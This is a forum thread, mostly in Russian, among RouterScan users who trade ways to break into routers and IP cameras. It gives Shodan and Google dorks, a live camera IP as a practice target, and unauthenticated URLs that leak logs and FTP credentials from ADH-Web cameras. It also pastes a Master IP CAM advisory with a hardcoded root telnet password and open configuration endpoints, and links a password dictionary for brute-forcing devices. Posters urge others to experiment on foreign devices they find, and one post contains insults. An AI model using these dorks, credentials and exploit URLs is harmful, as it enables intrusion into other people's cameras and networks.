Hi, Why sometimes RS show password on Asus RT-XXX v 2.0 device.. and later, in other scan, same ip device, show only ESSID ?
One exploit can obtain web interface password. Another exploit can only obtain BSSID and ESSID. Whether one of these exploits work depends on the router firmware.
how get to work both script ? same fimware, same ip only scan later, but show only essid, no password, never.
From vulnerability description: ... will be treated as signed-in if any other administrator session is active.
"Пользуясь случаем, хочу." (c) Хочу поделится для всех интересующихся, портабельной версией Charles 4.0, описание в архиве: https://yadi.sk/d/oCqBP7os3Rbdch
вы меня сподвигаете на подвиги во имя роутерскана тут натолкнулся недавно на одну железку - ADH-Web Server IP-Cameras. это не просто обычная айпи-камера. целый и довольно интересный сервер (пояснения для принципиальных анти-вуайеристов) ради интереса нашел экслойтик, но нет возможности сейчас его докрутить до удобоваримого для роутерскана состояния. может кто поиграется поплотнее? Spoiler: infa директория / hdd0 /logs позволяет удаленно просматривать произвольные файлы и получить многочисленную информацию через параметр «variable» в скрипте variable.cgi. шодан дорк : ADH-Web /gui/gui_outer_frame.shtml гугл дорк : /gui/gui_outer_frame.shtml можно просто, без поисковых запросов. этот без авторизации пускает в настройки. для изучения файловой структуры 85.189.234.21:8080 пример запроса: http://ip/hdd0/logs/log.txt наиболее интересные файлы bak.txt connect.txt log.txt seclog.log startup.txt DBGLOG.TXT access.txt security.txt проверенные апишники не даю. подвесят страждующие. только в личку (при необходимости) и только binarymaster-у. каждый может сам найти. в гугле их валом. правда не на всех прошивках срабатывает. полное описание эксплойта ( там есть еще реализации) Spoiler: exploit ADH-Web Server IP-Cameras Improper Access Restrictions Vulnerability Details Usually this directory can be protected against unauthenticated access (401 Unauthorized), though, it can access all files directly without requiring authentication.As in the statement below: [401] . 'http://<target_ip>/hdd0/logs' [200] . 'http://<target_ip>/hdd0/logs/log.txt' Most common logfiles: . 'bak.txt . 'connect.txt' . 'log.txt' . 'seclog.log' . 'startup.txt' . 'DBGLOG.TXT' . 'access.txt' . 'security.txt' Impact This could allow a remote attacker to obtain valuable information such as access credentials, Network configuration and other sensitive information in plain text. Another problem identified is an information exposure via the parameter "variable" in variable.cgi script. Knowing some variables can extract a reasonable amount of information. For exemplo: * DNS . 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0' * ftp master ftp console credenthials ((the development team said that this credential is not used, then why does it exist?): . ' http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0 ' . ' http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0 ' (although the vast majority of servers have ftp / telnet with anonymous access allowed.) * alarms . 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0' * camconfig . 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1' (includes, but is not limited to) There are a lot of variables [an audit tool is on the way]. This servers also sends credentials (and other sensitive data) via GET parameters This is poor practice as the URL is liable to be logged in any number of places between the customer and the camera. The credentials should be passed in the body of a POST request (under SSL of course, here is not the case). . (Is possible to create, edit and delete users and other configurations in this way, dangerous) 4. *Vulnerable Products and Packages* . The following products are affected: - SD Advanced Closed IPTV - SD Advanced - EcoSense - Digital Sprite 2 сорри если баян. память последнее время что-то подводить стала в случае чего - удалю пост, дабы не засорять форум. п.с. осторожнее с экспериментами. основная часть найденных мной серверов находится в штатах и грейтбритан . а то опять крику будет, по поводу атак русских хакеров . никто ведь не поймет, что это всего лишь дух творчества и здоровой любознательности
еще один свежий эксплойт на Master IP CAM. дорк не получилось найти. если кто сталкивался-поделитесь для экспериментов. Spoiler: exploit I DESCRIPTION ======================================================================== The Master IP CAM 01 suffers of multiple vulnerabilities: # [CVE-2018-5723] Hardcoded Password for Root Account # [CVE-2018-5724] Unauthenticated Configuration Download and Upload # [CVE-2018-5725] Unauthenticated Configuration Change # [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure II PROOF OF CONCEPT ======================================================================== ## [CVE-2018-5723] Hardcoded Password for Root Account Is possible to access telnet with the hardcoded credential root:cat1029 ## [CVE-2018-5724] Unauthenticated Configuration Download and Upload Download: http://192.168.1.15/web/cgi-bin/hi3510/backup.cgi Upload Form: ### Unauthenticated Configuration Upload <form name="form6" method="post" enctype="multipart/form-data" action="cgi-bin/hi3510/restore.cgi" > <input type="file" name="setting_file" > <input type="submit" value="restore" > </form> ## [CVE-2018-5725] Unauthenticated Configuration Change Change configuration: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=sethttpport&-httport=8080 List of available commands here: http://www.themadhermit.net/wp-content/uploads/2013/03/FI9821W-CGI-Commands.pdf ## [CVE-2018-5726] Unauthenticated Sensitive Information Disclousure Retrieve sensitive information: http://192.168.1.15/web/cgi-bin/hi3510/param.cgi?cmd=getuser на мой взгляд этот CVE-2018-5726 наиболее интересен, в том числе и для роутерскана.
исправил жаль, что опоздал. а я как-раз шодан-дорк нашел RT_IPC пост с эксплойтом не удаляю. может кому интересно будет самому поиграться... п.с. интересная статья на этот счет http://syrion.me/blog/master-ipcam/
Я задал вопрос, а не делему дураков, форум для того и форум, википедию вам в помощь, Люди воспитанные на сказках про Иванушку-дурачка и Соловья-разбойника не могут быть иными как генетическими склонными к преступлениям и недоразвитыми мозгами,которых следует изолировать от нормального сообщества в целях локализации чумы...
Я повторюсь, можно ли от сканировать или же нет, а если это уже где то выше описано то ткните. вот и все. Спасибо ( а на сказки перешли вы (буратино) как и на личности)
Может кому-то нужно, сделал огромный список паролей для RouterScan, думаю, он содержит почти все дефолтные и часто используемые пароли в сетевых устройствах (роутерах, камерах т.д.), повторов в списке нет, и везде по прописывал <empty>, для пустых полей, чтобы RS понимал. Только если будете использовать такие больше словари, вы таймаут в RS побольше ставьте http://zalil.su/4871484
А вот это в правду не видал, высшая сатира специалистов над попсой. Супер. Спасибо! Ржал как в детстве.
не в тему будь сказано, как раз наоборот. люди воспитанные на сказках про соловья разбойника и иванушку дурачка склонны к творческому мышлению. а вот люди воспитанные на покемонах, халках, бетменах и манге точно "склонны к преступлениям и недоразвитым мозгам". никого лично не имел ввиду. просто уточнение истины ради...